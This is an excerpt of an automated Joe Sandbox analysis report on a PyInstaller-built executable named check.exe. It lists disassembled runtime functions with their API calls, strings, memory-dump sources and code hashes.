_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6D923D70A
RtlUnwindEx.KERNEL32 ref: 00007FF6D923D764

Strings

csm, xrefs: 00007FF6D923D6F1

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: 90ed1b677a17c0a048b317639764e6b6b5496bf3c5e7bd9ebd499ca50b40bb1d
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: 62518236B296028AFB14CF25E64467C7795EB44B98F10823ADA4D87B48DF7EE861C740

Function 00007FF6D923F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6D923F2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6D923F398

Strings

csm, xrefs: 00007FF6D923F2D2
csm, xrefs: 00007FF6D923F3EA

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 938a166f14d5b3faecff409ff6ab078ed3e708552987b8923e4aa84a9d60322c
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: 08516032B2838286FB648E32A2842AD77A0FB55B94F14413BDB5D87B95CF3CE464C701

Function 00007FF6D923EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6D923EF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6D923EF83

Strings

RCC, xrefs: 00007FF6D923EF53
MOC, xrefs: 00007FF6D923EF4B

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: e1f27f051601a28de0f9f841449a888f6351eb938131727366f0b3c5f160ae1b
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: B96183329187C586FB608F25E5403AEB7A0FB94794F04422AEB9C47B59CF7CD1A4CB00

Function 00007FF6D9232810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6D92328EA

Strings

[PYI-%d:%ls] , xrefs: 00007FF6D9232868
ERROR, xrefs: 00007FF6D923286F
Error, xrefs: 00007FF6D92328DD

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: a72686d9280abd6a14681a88a0171f3557ae57617388346e3e1d7cefe55a9548
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: 7121DE62B29B4182F720DF24F9407EE63A0EB88780F400136EE8D9365ADE3CD265C740

Function 00007FF6D924C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6D924C61F
WriteFile.KERNEL32 ref: 00007FF6D924C8E7
WriteFile.KERNEL32 ref: 00007FF6D924C92D
GetLastError.KERNEL32 ref: 00007FF6D924C9E3

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: 9df5c257e363b08a577b48684df8b15467517961c8318c0f5d125604649db551
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: 32D1F472B28A419AFB11CF69D6401FC37B1FB69798B404236DE4D97B99DE38D026CB00

Function 00007FF6D92320C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6D92320F4
SetWindowLongPtrW.USER32 ref: 00007FF6D9232116
GetWindowLongPtrW.USER32 ref: 00007FF6D9232140
InvalidateRect.USER32 ref: 00007FF6D9232160

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 46b48ca7ab45a556242990f544d4f8fccacace9b67c3ad0b59e5716cc2e10d46
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: AC11A921A2C14242FA549F79EB4427D5261EB95780F448036DB4947B9ECD2DD8E58200

Function 00007FF6D9255B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D9251760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9251793

_get_daylight.LIBCMT ref: 00007FF6D9255C34
_get_daylight.LIBCMT ref: 00007FF6D9255C45

Strings

?, xrefs: 00007FF6D9255BC5

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction ID: c49b2361bda0480ce4927e52f6e2bbe59d08c55286f24d7e45d941310c0aba7a
Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction Fuzzy Hash: 07412C12A2864246FBA48F65D60577D67A0EB90BA4F144236EE5C87BDDDF3CD461C700

Function 00007FF6D9249014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9249046

Part of subcall function 00007FF6D924A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6D9252D22,?,?,?,00007FF6D9252D5F,?,?,00000000,00007FF6D9253225,?,?,?,00007FF6D9253157), ref: 00007FF6D924A95E
Part of subcall function 00007FF6D924A948: GetLastError.KERNEL32(?,?,?,00007FF6D9252D22,?,?,?,00007FF6D9252D5F,?,?,00000000,00007FF6D9253225,?,?,?,00007FF6D9253157), ref: 00007FF6D924A968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6D923CBA5), ref: 00007FF6D9249064

Strings

C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe, xrefs: 00007FF6D9249052

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
API String ID: 3580290477-822639180
Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction ID: 257a1d72e7a311a04180b1085dba30d646ac2a2d837d587b43c268818c9d4b2a
Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction Fuzzy Hash: 2641B036A28B1286FB15DF25DA400BD63A4EF58BD0F555037E94E83B85DE3CE4A1CB00

Function 00007FF6D924CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6D924CD4F
GetLastError.KERNEL32 ref: 00007FF6D924CD71

Strings

U, xrefs: 00007FF6D924CCFB

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: 24d58a9c6458f58f7d7e1576aabb332dd7c1194762adbb1300ddae4478e1386e
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: C0418222A29A4185EB60EF29E9443BE6760FB98794F444136EE4DC7798EF3CD411CB40

Function 00007FF6D924F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6D924F5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6D924F64A

Strings

:, xrefs: 00007FF6D924F60E

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction ID: 9c062d747d8f0196f6113538bbc5c565aab7f39c67e3c2d424236bcf4e453cf6
Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction Fuzzy Hash: A021E672B2864181FB209F11D5842BD73A1FBE8B44F86403ADA9D87694DF7CE9548F41

Function 00007FF6D923FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6D923FD98
RaiseException.KERNEL32 ref: 00007FF6D923FDD9

Strings

csm, xrefs: 00007FF6D923FDC6

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: c6e5cdc7afdf41bab94a7f846cc507a26bcc2c8058992917685f74bb71160e49
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: 07111C32618B8582FB618F25F5442AD77E4FB88B84F584235DA8D47758DF3CD561C740

Function 00007FF6D925073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D925076C
GetDriveTypeW.KERNEL32 ref: 00007FF6D92507AC

Strings

:, xrefs: 00007FF6D9250795

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: bd0bb8857886393a32a35f6ade93f0df403854c2053bae212cbd0de306637616
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: 6B01D622A3C60386F7B0AF60996127E23A0EF58744F840437D54DC2699EF3CE524CF14

Analysis Process: check.exePID: 1008, Parent PID: 6640COMMON

Execution Graph

Execution Coverage:	37.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	278
Total number of Limit Nodes:	9

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF6D9231000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6D9233D12
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF6D9233EBB
pyi-contents-directory, xrefs: 00007FF6D9233B8D
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF6D9233B32
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF6D9233EA6
pyi-python-flag, xrefs: 00007FF6D9233AD6
pyi-runtime-tmpdir, xrefs: 00007FF6D9233B68
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF6D9233971
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6D92339DE
Failed to convert DLL search path!, xrefs: 00007FF6D9233DDC
Failed to start splash screen!, xrefs: 00007FF6D9233ED4
Failed to load splash screen resources!, xrefs: 00007FF6D9233E85
_PYI_SPLASH_IPC, xrefs: 00007FF6D9233A23, 00007FF6D9233EF5
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF6D9233A0B, 00007FF6D9233CD4, 00007FF6D9233F6B
_PYI_ARCHIVE_FILE, xrefs: 00007FF6D92338D2, 00007FF6D92339FF
pyi-disable-windowed-traceback, xrefs: 00007FF6D9233BB2
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF6D9233E0A
MEI, xrefs: 00007FF6D9233933
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF6D9233D35
pkg, xrefs: 00007FF6D92339BE
Failed to remove temporary directory: %s, xrefs: 00007FF6D9233FCF
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6D9233BE8
Could not create temporary directory!, xrefs: 00007FF6D9233CBF
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6D9233C61
VCRUNTIME140.dll, xrefs: 00007FF6D9233DB1
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF6D9233882, 00007FF6D92338AF
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF6D9233A17, 00007FF6D9233A2F, 00007FF6D9233A9B
Py_GIL_DISABLED, xrefs: 00007FF6D9233AF4

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
API String ID: 2776309574-4232158417
Opcode ID: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
Instruction ID: 0264d6f59cb271002a02b51ade3f4e7c1abb7c7c177db248fa25a21af4a1f337
Opcode Fuzzy Hash: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
Instruction Fuzzy Hash: 4D327D21E2C68291FB59EF3596553BD26A1AF54780F84403BDA5DC72E6EF2CE678C300

Function 00007FF6D9256964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D9256698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92566D9
Part of subcall function 00007FF6D9256698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9256757
Part of subcall function 00007FF6D9256698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92567A8

CreateFileW.KERNEL32 ref: 00007FF6D9256A6A
CreateFileW.KERNEL32 ref: 00007FF6D9256ABA
GetLastError.KERNEL32 ref: 00007FF6D9256AEA
GetFileType.KERNEL32 ref: 00007FF6D9256AFF
GetLastError.KERNEL32 ref: 00007FF6D9256B09
CloseHandle.KERNEL32 ref: 00007FF6D9256B3C
CloseHandle.KERNEL32 ref: 00007FF6D9256C9F
CreateFileW.KERNEL32 ref: 00007FF6D9256CD4
GetLastError.KERNEL32 ref: 00007FF6D9256CE3

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: 7ed3ff2c53b3acb50fad176558a18383b4d3132e3cb2296cf383881a14ce71ee
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: C9C1BE36B38A4185FB50DFA9D6906BD3761FB49BA8F014236DA1E97798CF38D461C700

Function 00007FF6D9239280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF6D92392B3
FindClose.KERNEL32 ref: 00007FF6D92392C2

Memory Dump Source

Source File: 00000005.00000002.2594123147.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000005.00000002.2594059844.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594222924.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594336044.00007FF6D9271000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2594465866.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff6d9230000_check.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: 133a4cd4e2e13453ab5880cae6d8d1fae538542f5cfa4e0736bb1852a2893039
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: 98F0C826E28741C6F7A08F60B58877E7350AB84724F04033AD96D82AD4DF3CD068CB00

Function 00007FF6D9231950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D9237F90: _fread_nolock.LIBCMT ref: 00007FF6D923803A

_fread_nolock.LIBCMT ref: 00007FF6D9231A1B

Part of subcall function 00007FF6D9232910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6D9231B6A), ref: 00007FF6D923295E

Strings

calloc, xrefs: 00007FF6D9231A68
Failed to read cookie!, xrefs: 00007FF6D9231A2B
MEI, xrefs: 00007FF6D9231991
fread, xrefs: 00007FF6D9231A32, 00007FF6D9231B5C
fseek, xrefs: 00007FF6D92319F5
